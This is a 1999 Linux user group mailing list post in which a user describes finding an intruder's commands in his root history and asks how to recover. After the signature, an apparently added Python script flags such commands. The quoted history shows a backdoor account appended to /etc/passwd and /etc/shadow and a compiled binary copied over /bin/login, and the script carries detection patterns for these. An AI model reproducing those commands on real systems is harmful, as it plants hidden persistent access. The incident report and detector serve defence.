[lug] security

Sevinsky Joel sevinsky at ucsu.Colorado.EDU
Sat Nov 27 13:24:40 MST 1999


Hello All,

Being new to Linux I received an education in security this weekend.  I
have a Pentium Pro system at home running Red Hat 6.0 (I installed
EVERYTHING during the installation) and I have DSL using DHCP through CU
as my ISP and USWEST for the service.  I discovered something in my root
history today that was strange (as in commands that I did not enter):

   23  uname -a; pwd;
   24  mkdir /dev/hda23
   25  cd /dev/hda23
   26  ftp dshllone.net
   27  ftp shellone.net

For these commands I cannot find anything in the last file that is
unusual.  No logins from unknown computers.  It actually corresponds to a
period of time when the system was running for only a few minutes and
everything around it looks fine also.  Not so for the following.

   46  uname -a; pwd;
   47  cd /tmp
   48  passwd gdm
   49  passwd gdm
   50  echo "snow1:X:200:200:::/bin/sh" >> /etc/passwd
   51  echo "snow1:NOU4mAe45g67k:10776:0:99999:7:::" >> /etc/shadow
   52  cd /tmp
   53  gcc bj.c -o bj
   54  cp /bin/login /bin/xcat
   55  cp bj /bin/login
   56  cd /tmp
   57  cp bj /bin/login
   58  who;

These commands were from a time when my system was up for a few days with
the same IP address and I do very little as root (usually just shutdown).
The logins that correspond to this period of time are:

root     tty1         Sun Nov 21 21:33 - down   (00:00)
snow1    pts/1        Sun Nov 21 13:35 - 13:47  (00:12)
ts003d40.tac-wa.concentric.net        
sevinsky pts/0        Sun Nov 21 07:46 - 21:32  (13:45)     :0
sevinsky pts/0        Fri Nov 19 08:09 - 15:04 (1+06:54)    :0
sevinsky pts/0        Thu Nov 18 18:31 - 18:32  (00:01)     :0
sevinsky pts/0        Thu Nov 18 17:41 - 17:50  (00:09)     :0
sevinsky tty1         Thu Nov 18 17:37 - 21:32 (3+03:55)
sevinsky pts/0        Thu Nov 18 17:03 - 17:05  (00:02)
1Cust68.tnt14.denver.co.da.uu.net
sevinsky pts/0        Thu Nov 18 17:02 - 17:02  (00:00)
1Cust68.tnt14.denver.co.da.uu.net
sevinsky pts/0        Thu Nov 18 13:56 - 13:57  (00:00)
chem203.Colorado.EDU
sevinsky pts/0        Thu Nov 18 09:18 - 10:20  (01:01)     :0
sevinsky pts/0        Wed Nov 17 23:16 - 23:23  (00:06)     :0
sevinsky tty1         Wed Nov 17 22:59 - 10:20  (11:21)
root     tty1         Wed Nov 17 22:56 - 22:59  (00:02)
reboot   system boot  Wed Nov 17 22:55                                       

The only accounts I have set up on this machine are sevinsky (me) and
amy (my wife). I am assuming that the first break was from 
1Cust68.tnt14.denver.co.da.uu.net and somehow knew my login and password
and set up the snow1 account.  Then they later came back as snow1 from
concentric.net and compiled and installed bj.c.  I am guessing that after
I rebooted my machine and got a different IP address they were not able to
find my system again.  Well that being said, what should be done from
here?  Should I just reinstall everything?  That would not be difficult at
all.  Any suggestions on some good reading to learn about security?  I
have the Running Linux book and I am about 200 pages into it but if I want
to keep my system running I better do some quick reading on security.
Thanks for your help.

Joel Sevinsky

*******************************************
Joel Sevinsky
Department of MCD Biology
Campus Box 347
University of Colorado
Boulder, CO  80303

(303)492-7794     FAX: (303)492-2439
joel at sevinsky.com
http://www.sevinsky.com
******************************************
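A defender-side check of the kind the evidence in this message calls for, added here as an example and not part of the original post: it scans root's shell history for commands that write to /etc/passwd or /etc/shadow, overwrite /bin/login, or reset account passwords, and flags /etc/passwd entries that are not in the expected account list or are malformed. The history and passwd lines are constructed from what the post quotes; the KNOWN account set is an assumption (the accounts the admin created plus the distribution's own system accounts).

```python
import re
# Constructed from the root history quoted in the post (not a live capture).
HISTORY = """cd /tmp
passwd gdm
echo "snow1:X:200:200:::/bin/sh" >> /etc/passwd
echo "snow1:NOU4mAe45g67k:10776:0:99999:7:::" >> /etc/shadow
gcc bj.c -o bj
cp /bin/login /bin/xcat
cp bj /bin/login
who;"""

# Constructed /etc/passwd: the post's two real users, a system account, the rogue entry.
PASSWD = """root:x:0:0:root:/root:/bin/bash
gdm:x:42:42::/home/gdm:/bin/bash
sevinsky:x:500:500:Joel:/home/sevinsky:/bin/bash
amy:x:501:501:Amy:/home/amy:/bin/bash
snow1:X:200:200:::/bin/sh"""

# Assumed: the accounts the admin created plus the distro's own system accounts.
KNOWN = {"root", "gdm", "sevinsky", "amy"}

# Root-history patterns worth a second look: writes to auth files, /bin/login or
# /bin/su overwritten (destination is the last argument), password resets.
SUSPICIOUS = [
    (re.compile(r">>?\s*/etc/(passwd|shadow|group)\b"), "writes to auth file"),
    (re.compile(r"\bcp\b.*\s/bin/(login|su)\s*$"), "replaces login binary"),
    (re.compile(r"\bpasswd\s+\w+"), "resets an account password"),
]

def flag_history(text):
    """Return (command, reason) for each history line matching a pattern."""
    hits = []
    for line in text.splitlines():
        for pat, why in SUSPICIOUS:
            if pat.search(line):
                hits.append((line, why))
                break
    return hits

def audit_passwd(text, known):
    """Return (user, reason) for passwd entries that are unexpected or malformed."""
    odd = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            odd.append((f[0], "wrong field count"))
        elif f[0] not in known:
            odd.append((f[0], "not an expected account"))
        elif f[1] != "x":
            odd.append((f[0], "password field not shadowed"))
    return odd
```

On the constructed history this flags the `passwd gdm` line, both `echo ... >>` lines and `cp bj /bin/login`, while the backup copy `cp /bin/login /bin/xcat` is not reported because /bin/login is its source, not its destination. Comparing /bin/login and friends against the package manager's checksums (rpm -V on Red Hat) is the companion check, since history can be edited or cleared.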